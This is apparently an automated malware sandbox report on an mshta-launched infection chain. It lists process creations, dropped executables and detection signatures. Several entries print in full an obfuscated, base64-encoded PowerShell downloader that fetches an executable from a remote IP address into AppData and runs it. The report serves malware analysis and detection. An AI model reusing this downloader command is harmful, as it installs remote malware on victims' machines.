Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))" Jump to behavior
Suspicious command line found
Source: C:\Windows\SysWOW64\mshta.exe Process created: "C:\Windows\system32\cmd.exe" "/C pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe Process created: "C:\Windows\system32\cmd.exe" "/C pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))" Jump to behavior
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErshEll -EX BYpasS -nOP -W 1 -c dEviCeCredENTIaLDeplOYmEnT ; iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))" Jump to behavior
Compiles C# or VB.Net code
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.cmdline" Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AB4B37 LoadLibraryA,GetProcAddress, 6_2_00AB4B37
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AD8945 push ecx; ret 6_2_00AD8958
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040D946 push ds; ret 7_2_0040D95D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004271D3 push esp; ret 7_2_00427239
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00417A65 push 1D9A8CFAh; ret 7_2_00417A6A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004142E1 push ss; iretd 7_2_00414337
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004142BB pushfd ; retf 7_2_004142E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004034A0 push eax; ret 7_2_004034A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040856C push edi; iretd 7_2_00408586
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_004145E2 push ecx; iretd 7_2_004145ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041AEAF push es; retf 7_2_0041AEB6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00417735 pushad ; iretd 7_2_00417736
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0040D7A3 pushfd ; retf 7_2_0040D7A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B309AD push ecx; mov dword ptr [esp], ecx 7_2_03B309B6
Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\win[1].exe Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\winnit.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 6_2_00AB48D7
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00B35376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 6_2_00B35376
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Roaming\winnit.exe Code function: 6_2_00AD3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_00AD3187
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
